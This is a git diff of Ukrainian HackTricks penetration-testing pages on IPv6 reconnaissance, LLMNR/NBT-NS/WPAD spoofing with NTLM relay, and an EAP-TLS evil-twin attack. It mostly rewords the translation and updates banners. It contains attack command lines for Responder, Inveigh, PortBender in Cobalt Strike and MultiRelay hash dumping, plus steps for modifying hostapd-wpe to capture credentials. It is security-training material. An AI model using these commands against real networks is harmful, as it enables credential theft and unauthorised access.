+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або групи [**telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github репозиторіїв. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 8b2b9ee20..b83bf9fbf 100644 --- a/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md @@ -1,29 +1,30 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # Основи IPv6 ## Мережі -IPv6-адреси структуровані для покращення організації мережі та взаємодії пристроїв. IPv6-адреса поділяється на: +Адреси IPv6 структуровані для покращення організації мережі та взаємодії пристроїв. Адреса IPv6 поділяється на: 1. **Префікс мережі**: Перші 48 біт, що визначають сегмент мережі. 2. **Ідентифікатор підмережі**: Наступні 16 біт, використовуються для визначення конкретних підмереж у мережі. 3. **Ідентифікатор інтерфейсу**: Останні 64 біти, унікально ідентифікують пристрій у межах підмережі. -Хоча IPv6 не містить протокол ARP, який зустрічається в IPv4, він вводить **ICMPv6** з двома основними повідомленнями: +Хоча IPv6 не містить протокол ARP, який є в IPv4, він вводить **ICMPv6** з двома основними повідомленнями: - **Запит сусіда (NS)**: Мультікастові повідомлення для вирішення адреси. - **Оголошення сусіда (NA)**: Унікастові відповіді на NS або спонтанні оголошення. @@ -36,7 +37,7 @@ IPv6 також включає спеціальні типи адрес: Для взаємодії з мережами IPv6 можна використовувати різні команди: - **Ping Link-Local Addresses**: Перевірте наявність локальних пристроїв за допомогою `ping6`. - **Виявлення сусіда**: Використовуйте `ip neigh`, щоб переглянути пристрої, виявлені на рівні зв'язку. -- **alive6**: Альтернативний інструмент для виявлення пристроїв в одній мережі. +- **alive6**: Альтернативний інструмент для виявлення пристроїв у тій самій мережі. Нижче наведені приклади команд: ```bash @@ -48,7 +49,7 @@ alive6 eth0 ``` ## **Отримання Link-local IPv6 з MAC-адреси** -Задано MAC-адресу **`12:34:56:78:9a:bc`**, ви можете побудувати Link-local IPv6 адресу наступним чином: +Заданий MAC-адрес **`12:34:56:78:9a:bc`**, ви можете побудувати адресу Link-local IPv6 наступним чином: 1. Перетворіть MAC у формат IPv6: **`1234:5678:9abc`** 2. Додайте `fe80::` та вставте `fffe` посередині: **`fe80::1234:56ff:fe78:9abc`** @@ -57,12 +58,12 @@ alive6 eth0 ## **Типи адрес IPv6** - **Унікальна локальна адреса (ULA)**: Для локальних комунікацій, не призначена для маршрутизації в Інтернеті. Префікс: **`FEC00::/7`** -- **Мультікаст-адреса**: Для один-до-багатьох комунікацій. Доставляється на всі інтерфейси у групі мультікасту. Префікс: **`FF00::/8`** -- **Анікаст-адреса**: Для один-до-найближчої комунікації. Надсилається на найближчий інтерфейс згідно з протоколом маршрутизації. Частина глобального діапазону унікасту **`2000::/3`**. +- **Мультікаст-адрес**: Для один-до-багатьох комунікацій. Доставляється до всіх інтерфейсів у групі мультікасту. Префікс: **`FF00::/8`** +- **Анікаст-адрес**: Для один-до-найближчої комунікації. Надсилається до найближчого інтерфейсу згідно з протоколом маршрутизації. Частина глобального діапазону унікасту **`2000::/3`**. ## **Префікси адрес** -- **fe80::/10**: Адреси Link-Local (аналогічно 169.254.x.x) -- **fc00::/7**: Унікаст Унікальної Локальності (аналогічно приватним діапазонам IPv4, таким як 10.x.x.x, 172.16.x.x, 192.168.x.x) +- **fe80::/10**: Адреси Link-Local (схожі на 169.254.x.x) +- **fc00::/7**: Унікаст Унікальної Локальності (схожі на приватні діапазони IPv4, такі як 10.x.x.x, 172.16.x.x, 192.168.x.x) - **2000::/3**: Глобальний Унікаст - **ff02::1**: Мультікаст Всі вузли - **ff02::2**: Мультікаст Вузли маршрутизатора @@ -83,44 +84,29 @@ ip -6 neigh # Display the neighbor table ## Атаки типу "людина посередині" (MitM) в IPv6 Існує кілька технік для виконання атак типу MitM в мережах IPv6, таких як: -- Підробка сусідніх або маршрутизаторних оголошень ICMPv6. +- Підробка сусідських або маршрутизаторних оголошень ICMPv6. - Використання повідомлень ICMPv6 перенаправлення або "Пакет занадто великий" для маніпулювання маршрутизацією. - Атака на мобільний IPv6 (зазвичай потрібно вимкнути IPSec). - Налаштування підробленого сервера DHCPv6. -# Визначення IPv6-адрес в полі +# Визначення IPv6-адрес в дикій природі ## Дослідження піддоменів -Метод пошуку піддоменів, які потенційно пов'язані з IPv6-адресами, включає використання пошукових систем. Наприклад, використання шаблону запиту, подібного до `ipv6.*`, може бути ефективним. Зокрема, для цього можна використовувати наступну команду пошуку в Google: +Метод пошуку піддоменів, які потенційно пов'язані з IPv6-адресами, включає використання пошукових систем. Наприклад, використання шаблону запиту `ipv6.*` може бути ефективним. Зокрема, для цього можна використовувати наступну команду пошуку в Google: ```bash site:ipv6./ ``` ## Використання запитів DNS -Для виявлення IPv6-адрес можна виконати певні типи записів DNS: +Для ідентифікації IPv6-адрес можна використовувати певні типи записів DNS: - **AXFR**: Запит повного зонного трансферу, що потенційно може розкрити широкий спектр записів DNS. - **AAAA**: Прямий пошук IPv6-адрес. - **ANY**: Широкий запит, який повертає всі доступні записи DNS. -## Дослідження за допомогою Ping6 -Після визначення IPv6-адрес, що пов'язані з організацією, можна використовувати утиліту `ping6` для дослідження. Цей інструмент допомагає оцінити реакцію визначених IPv6-адрес та може також допомогти в виявленні сусідніх пристроїв з IPv6. +## Пробування з Ping6 +Після визначення IPv6-адрес, пов'язаних з організацією, можна використовувати утиліту `ping6` для пробування. Цей інструмент допомагає оцінити реакцію визначених IPv6-адрес та може також допомогти в виявленні сусідніх пристроїв з IPv6. ## Посилання * [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html) * [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904) - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github репозиторіїв. - -
diff --git a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index 4b3bb99e0..52a46375a 100644 --- a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -1,18 +1,19 @@ -# Підроблення LLMNR, NBT-NS, mDNS/DNS та WPAD та атаки реле +# Підроблення LLMNR, NBT-NS, mDNS/DNS та WPAD та атаки релею + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Протоколи мережі @@ -23,13 +24,13 @@ - [Responder](https://github.com/lgandx/Responder) може бути використаний для підроблення служб шляхом відправлення підроблених відповідей на хости, які запитують ці протоколи. - Додаткову інформацію про підроблення служб за допомогою Responder можна знайти [тут](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md). -### Протокол автоматичного виявлення веб-проксі (WPAD) -- WPAD дозволяє браузерам автоматично виявляти налаштування проксі. -- Виявлення здійснюється через DHCP, DNS або в разі невдачі - через LLMNR та NBT-NS. +### Протокол автоматичного відкриття веб-проксі (WPAD) +- WPAD дозволяє браузерам автоматично відкривати налаштування проксі. +- Відкриття здійснюється через DHCP, DNS або в разі невдачі - через LLMNR та NBT-NS. - Responder може автоматизувати атаки WPAD, направляючи клієнтів на зловмисні сервери WPAD. ### Responder для отруєння протоколів -- **Responder** - це інструмент, який використовується для отруєння запитів LLMNR, NBT-NS та mDNS, відповідаючи вибірково на типи запитів, переважно спрямовуючи на служби SMB. +- **Responder** - це інструмент, який використовується для отруєння запитів LLMNR, NBT-NS та mDNS, відповідаючи вибірково на типи запитів, переважно спрямованих на служби SMB. - Він поставляється заздалегідь в Kali Linux, налаштовується в `/etc/responder/Responder.conf`. - Responder відображає захоплені хеші на екрані та зберігає їх у каталозі `/usr/share/responder/logs`. - Підтримує як IPv4, так і IPv6. @@ -46,17 +47,17 @@ - Підроблення відповідей DHCP може постійно отруїти інформацію маршрутизації жертви, пропонуючи більш прихований альтернативний варіант отруєння ARP. - Це вимагає точного знання конфігурації мережі цільової мережі. - Запуск атаки: `./Responder.py -I eth0 -Pdv` -- Цей метод ефективно може захоплювати хеші NTLMv1/2, але вимагає обережної обробки для уникнення перебоїв в мережі. +- Цей метод може ефективно захоплювати хеші NTLMv1/2, але вимагає обережного обходу для уникнення розриву мережі. ### Захоплення облікових даних за допомогою Responder - Responder буде підробляти служби за допомогою вищезгаданих протоколів, захоплюючи облікові дані (зазвичай виклик/відповідь NTLMv2), коли користувач намагається аутентифікуватися проти підроблених служб. - Можливі спроби зниження до NetNTLMv1 або вимкнення ESS для полегшення розкриття облікових даних. -Важливо зауважити, що використання цих технік повинно бути здійснене законно та етично, забезпечуючи належну авторизацію та уникнення перешкод або несанкціонованого доступу. +Важливо зауважити, що використання цих технік повинно бути здійснене законно та етично, забезпечуючи належну авторизацію та уникнення розриву або несанкціонованого доступу. ## Inveigh -Inveigh - це інструмент для пентестерів та команд червоних команд, призначений для систем Windows. Він пропонує функціонал, схожий на Responder, виконуючи атаки підроблення та людини посередника. Інструмент розвинувся з PowerShell скрипту до бінарного файлу C#, з [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) та [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) як основні версії. Детальні параметри та інструкції можна знайти в [**вікі**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters). +Inveigh - це інструмент для пентестерів та команд червоних команд, призначений для систем Windows. Він пропонує функціональність, схожу на Responder, виконуючи підроблення та атаки людини посередника. Інструмент еволюціонував з PowerShell скрипту до бінарного файлу C#, з [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) та [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) як основні версії. Детальні параметри та інструкції можна знайти в [**вікі**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters). Inveigh може бути запущений через PowerShell: ```powershell @@ -66,15 +67,15 @@ Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y ```bash Inveigh.exe ``` -### Атака NTLM Relay +### Атака перехоплення NTLM -Ця атака використовує сесії аутентифікації SMB для доступу до цільової машини, надаючи системний shell у разі успіху. Основні передумови включають: +Ця атака використовує сеанси аутентифікації SMB для доступу до цільової машини, що надає системну оболонку у разі успіху. Основні передумови включають: - Користувач, який аутентифікується, повинен мати локальний адміністративний доступ на пересиланому хості. - Підпис SMB повинен бути вимкнений. #### Перенаправлення та тунелювання порту 445 -У випадках, коли пряме мережеве підключення неможливе, потрібно перенаправити та тунелювати трафік на порту 445. Інструменти, такі як [**PortBender**](https://github.com/praetorian-inc/PortBender), допомагають перенаправити трафік порту 445 на інший порт, що є важливим, коли доступний локальний адміністративний доступ для завантаження драйверів. +У випадках, коли пряме введення в мережу неможливе, потрібно перенаправити та тунелювати трафік на порту 445. Інструменти, такі як [**PortBender**](https://github.com/praetorian-inc/PortBender), допомагають перенаправити трафік порту 445 на інший порт, що є важливим, коли доступний локальний адміністративний доступ для завантаження драйверів. Налаштування та робота PortBender в Cobalt Strike: ```bash @@ -96,7 +97,7 @@ beacon> socks stop - **Metasploit**: Налаштування з проксі, локальними та віддаленими даними хосту. - **smbrelayx**: Скрипт на Python для передачі сеансів SMB та виконання команд або розгортання задніх дверей. -- **MultiRelay**: Інструмент з набору Responder для передачі конкретних користувачів або всіх користувачів, виконання команд або вилучення хешів. +- **MultiRelay**: Інструмент з набору Responder для передачі конкретних користувачів або всіх користувачів, виконання команд або виведення хешів. Кожен інструмент може бути налаштований на роботу через проксі-сервер SOCKS у разі необхідності, що дозволяє здійснювати атаки навіть з опосередкованим мережевим доступом. @@ -112,7 +113,7 @@ python MultiRelay.py -t -u ALL -d # Dump hashes ``` ### Примусові входи NTLM -У Windows ви **можете змусити деякі привілейовані облікові записи аутентифікуватися на довільних машинах**. Прочитайте наступну сторінку, щоб дізнатися, як це зробити: +У Windows ви **можете змусити деякі привілейовані облікові записи аутентифікуватися на довільних машинах**. Прочитайте наступну сторінку, щоб дізнатися як: {% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} [printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md) @@ -126,16 +127,17 @@ python MultiRelay.py -t -u ALL -d # Dump hashes * [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи телеграм**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md b/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md index 1885f3884..3e4861921 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md +++ b/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md @@ -1,18 +1,19 @@ # Зловмисний близнюк EAP-TLS +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} \ **Підказка щодо багів**: **зареєструйтеся** на **Intigriti**, преміальній **платформі для пошуку багів, створеній хакерами для хакерів**! Приєднуйтесь до нас на [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) сьогодні, і почніть заробляти винагороди до **$100,000**! @@ -20,8 +21,8 @@ {% embed url="https://go.intigriti.com/hacktricks" %} На певному етапі мені довелося скористатися запропонованим рішенням у публікації нижче, але кроки на [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) більше не працювали в сучасному kali (2019v3).\ -В будь-якому випадку, їх легко працювати.\ -Вам потрібно лише завантажити hostapd-2.6 звідси: [https://w1.fi/releases/](https://w1.fi/releases/) і перед компіляцією hostapd-wpe знову встановити: `apt-get install libssl1.0-dev` +В будь-якому випадку, їх легко зробити працюючими.\ +Вам потрібно лише завантажити hostapd-2.6 звідси: [https://w1.fi/releases/](https://w1.fi/releases/) і перед компіляцією hostapd-wpe встановити: `apt-get install libssl1.0-dev` ### Аналіз та Використання EAP-TLS у бездротових мережах @@ -29,29 +30,29 @@ EAP-TLS - це протокол безпеки, який забезпечує взаємну аутентифікацію між клієнтом та сервером за допомогою сертифікатів. Підключення встановлюється лише у випадку, якщо як клієнт, так і сервер аутентифікують сертифікати один одного. #### Зустрічена Проблема -Під час оцінки була виявлена цікава помилка при використанні інструменту `hostapd-wpe`. Інструмент відхиляв підключення клієнта через те, що сертифікат клієнта був підписаний невідомим Центром сертифікації (CA). Це свідчило про те, що клієнт довіряв фальшивому сертифікату сервера, вказуючи на недбалі конфігурації безпеки на стороні клієнта. +Під час оцінки була виявлена цікава помилка при використанні інструменту `hostapd-wpe`. Інструмент відхилив підключення клієнта через те, що сертифікат клієнта був підписаний невідомим Центром сертифікації (CA). Це свідчило про те, що клієнт дійсно довіряв фальшивому сертифікату сервера, вказуючи на недбалі конфігурації безпеки з боку клієнта. -#### Мета: Налаштування Атаки Людини посередині (MiTM) -Метою було змінити інструмент для прийняття будь-якого сертифіката клієнта. Це дозволить встановити з'єднання з зловмисною бездротовою мережею та активувати атаку MiTM, потенційно захоплюючи текстові паролі або інші чутливі дані. +#### Мета: Налаштування Атаки "Людина посередині" (MiTM) +Метою було змінити інструмент так, щоб він приймав будь-який сертифікат клієнта. Це дозволило б встановити з'єднання з зловмисною бездротовою мережею та активувати атаку MiTM, потенційно захоплюючи текстові дані облікових записів або інші чутливі дані. #### Рішення: Модифікація `hostapd-wpe` -Аналіз вихідного коду `hostapd-wpe` показав, що перевірка сертифіката клієнта контролювалася параметром (`verify_peer`) у функції OpenSSL `SSL_set_verify`. Змінивши значення цього параметра з 1 (перевірка) на 0 (не перевіряти), інструмент було змушено приймати будь-який сертифікат клієнта. +Аналіз вихідного коду `hostapd-wpe` показав, що перевірка сертифікату клієнта контролювалася параметром (`verify_peer`) у функції OpenSSL `SSL_set_verify`. Змінивши значення цього параметра з 1 (перевірка) на 0 (не перевіряти), інструмент було змушено приймати будь-який сертифікат клієнта. #### Виконання Атаки 1. **Перевірка Середовища:** Використовуйте `airodump-ng` для моніторингу бездротових мереж та ідентифікації цілей. -2. **Створення Фальшивої AP:** Запустіть модифікований `hostapd-wpe` для створення фальшивої Точки доступу (AP), що імітує цільову мережу. -3. **Налаштування Захоплення Порталу:** Налаштуйте сторінку входу захоплення порталу, щоб вона виглядала законно та знайомо для цільового користувача. +2. **Створення Фальшивої AP:** Запустіть модифікований `hostapd-wpe` для створення фальшивої точки доступу (AP), що імітує цільову мережу. +3. **Налаштування Захоплення Порталу:** Налаштуйте сторінку входу захопленого порталу так, щоб вона виглядала законно та знайомо для цільового користувача. 4. **Атака Відключення:** Опціонально виконайте атаку відключення для відключення клієнта від законної мережі та підключення його до фальшивої AP. -5. **Захоплення Облікових Даних:** Після підключення клієнта до фальшивої AP та взаємодії з захопленням порталу, їх облікові дані захоплюються. +5. **Захоплення Облікових Даних:** Після підключення клієнта до фальшивої AP та взаємодії з захопленим порталом, їх облікові дані захоплюються. #### Спостереження з Атаки -- На комп'ютерах з Windows система може автоматично підключатися до фальшивої AP, показуючи захоплення порталу при спробі навігації в Інтернеті. -- На iPhone користувач може бути попереджений про прийняття нового сертифіката, а потім побачити захоплення порталу. +- На комп'ютерах з Windows система може автоматично підключатися до фальшивої AP, показуючи захоплений портал при спробі навігації в Інтернеті. +- На iPhone користувач може бути попереджений про прийняття нового сертифіката, а потім побачити захоплений портал. #### Висновок Хоча EAP-TLS вважається безпечним, його ефективність в значній мірі залежить від правильної конфігурації та обережної поведінки кінцевих користувачів. Неправильно налаштовані пристрої або недбалі користувачі, які приймають підроблені сертифікати, можуть підірвати безпеку мережі, захищеної EAP-TLS. -Для отримання додаткових деталей див. https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/ +Для отримання додаткових відомостей див. https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/ ## Посилання * [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/) @@ -61,16 +62,17 @@ EAP-TLS - це протокол безпеки, який забезпечує в {% embed url="https://go.intigriti.com/hacktricks" %} +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md index 01dba5c36..b58c8bb6f 100644 --- a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md +++ b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md @@ -1,47 +1,62 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
